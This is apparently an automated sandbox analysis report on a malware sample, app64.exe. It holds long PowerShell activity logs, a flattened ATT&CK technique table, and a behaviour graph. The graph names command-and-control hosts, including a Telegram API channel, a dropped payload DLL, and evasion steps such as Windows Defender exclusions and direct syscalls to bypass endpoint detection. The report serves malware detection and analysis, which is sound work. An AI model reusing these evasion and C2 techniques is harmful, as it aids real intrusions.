          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows \System32\printui.exeCode function: 10_2_00007FF67A0E1A54 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetTickCount,QueryPerformanceCounter,10_2_00007FF67A0E1A54
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8B83AB3F0 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,send,recv,WSAGetLastError,closesocket,closesocket,closesocket,closesocket,28_2_00007FF8B83AB3F0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8B83B1EA6 calloc,calloc,calloc,bind,WSAGetLastError,28_2_00007FF8B83B1EA6
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8B837EFC0 strchr,strchr,inet_pton,strchr,strtoul,strchr,strtoul,memmove,getsockname,WSAGetLastError,inet_ntop,WSAGetLastError,memmove,htons,bind,WSAGetLastError,getsockname,getsockname,listen,WSAGetLastError,htons,28_2_00007FF8B837EFC0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8B83B2130 calloc,calloc,calloc,bind,WSAGetLastError,28_2_00007FF8B83B2130
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF8B83B1EA6 bind,WSAGetLastError,34_2_00007FF8B83B1EA6
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF8B837EFC0 strchr,strchr,inet_pton,strchr,strtoul,strchr,strtoul,memmove,getsockname,WSAGetLastError,inet_ntop,WSAGetLastError,memmove,htons,bind,WSAGetLastError,getsockname,getsockname,listen,WSAGetLastError,htons,34_2_00007FF8B837EFC0
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF8B83B2130 bind,WSAGetLastError,34_2_00007FF8B83B2130
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF8B83AB3F0 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,send,recv,WSAGetLastError,closesocket,closesocket,closesocket,closesocket,34_2_00007FF8B83AB3F0
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF8B8367410 memset,WSAGetLastError,strchr,inet_pton,htons,strtoul,inet_pton,htons,WSAGetLastError,htons,htons,bind,htons,bind,WSAGetLastError,34_2_00007FF8B8367410
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Native API
          1
          DLL Side-Loading
          1
          Abuse Elevation Control Mechanism
          1
          Disable or Modify Tools
          OS Credential Dumping11
          System Time Discovery
          1
          Exploitation of Remote Services
          12
          Archive Collected Data
          1
          Web Service
          Exfiltration Over Other Network Medium1
          Data Encrypted for Impact
          CredentialsDomainsDefault Accounts112
          Command and Scripting Interpreter
          111
          Windows Service
          1
          DLL Side-Loading
          1
          Deobfuscate/Decode Files or Information
          LSASS Memory2
          File and Directory Discovery
          Remote Desktop ProtocolData from Removable Media4
          Ingress Tool Transfer
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts1
          Scheduled Task/Job
          1
          Scheduled Task/Job
          111
          Windows Service
          1
          Abuse Elevation Control Mechanism
          Security Account Manager22
          System Information Discovery
          SMB/Windows Admin SharesData from Network Shared Drive21
          Encrypted Channel
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal Accounts1
          Service Execution
          Login Hook11
          Process Injection
          3
          Obfuscated Files or Information
          NTDS111
          Security Software Discovery
          Distributed Component Object ModelInput Capture1
          Non-Standard Port
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud Accounts2
          PowerShell
          Network Logon Script1
          Scheduled Task/Job
          1
          Software Packing
          LSA Secrets1
          Process Discovery
          SSHKeylogging4
          Non-Application Layer Protocol
          Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          DLL Side-Loading
          Cached Domain Credentials21
          Virtualization/Sandbox Evasion
          VNCGUI Input Capture15
          Application Layer Protocol
          Data Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          File Deletion
          DCSync1
          Application Window Discovery
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job231
          Masquerading
          Proc Filesystem1
          System Network Configuration Discovery
          Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
          Modify Registry
          /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron21
          Virtualization/Sandbox Evasion
          Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
          Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd11
          Process Injection
          Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1545289 Sample: app64.exe Startdate: 30/10/2024 Architecture: WINDOWS Score: 100 111 api.telegram.org 2->111 113 rootunvdwl.com 2->113 115 6 other IPs or domains 2->115 129 Malicious sample detected (through community Yara rule) 2->129 131 Multi AV Scanner detection for dropped file 2->131 133 Multi AV Scanner detection for submitted file 2->133 137 14 other signatures 2->137 12 cmd.exe 1 2->12         started        15 svchost.exe 2->15         started        18 app64.exe 2->18         started        20 2 other processes 2->20 signatures3 135 Uses the Telegram API (likely for C&C communication) 111->135 process4 dnsIp5 165 Suspicious powershell command line found 12->165 167 Uses schtasks.exe or at.exe to add and modify task schedules 12->167 169 Adds a directory exclusion to Windows Defender 12->169 22 powershell.exe 14 18 12->22         started        27 conhost.exe 12->27         started        123 rootunvbot.com 188.116.21.204, 49946, 50021, 5432 NEPHAX-ASPL Poland 15->123 125 unvdwl.com 194.26.192.52, 49988, 49991, 49998 HEANETIE Netherlands 15->125 127 3 other IPs or domains 15->127 29 cmd.exe 1 15->29         started        31 cmd.exe 15->31         started        33 cmd.exe 15->33         started        35 cmd.exe 15->35         started        171 Suspicious command line found 18->171 173 Found direct / indirect Syscall (likely to bypass EDR) 18->173 37 cmd.exe 20->37         started        signatures6 process7 dnsIp8 117 github.com 140.82.121.4, 443, 49704, 50011 GITHUBUS United States 22->117 119 raw.githubusercontent.com 185.199.111.133, 443, 49705, 50017 FASTLYUS Netherlands 22->119 99 C:\Users\Public\pyld.dll, PE32+ 22->99 dropped 143 Drops PE files to the user root directory 22->143 145 Drops executables to the windows directory (C:\Windows) and starts them 22->145 147 Found suspicious powershell code related to unpacking or dynamic code loading 22->147 149 Powershell drops PE file 22->149 39 printui.exe 1 15 22->39         started        51 4 other processes 22->51 151 Adds a directory exclusion to Windows Defender 29->151 43 powershell.exe 23 29->43         started        45 conhost.exe 29->45         started        47 powershell.exe 31->47         started        49 conhost.exe 31->49         started        53 2 other processes 33->53 55 2 other 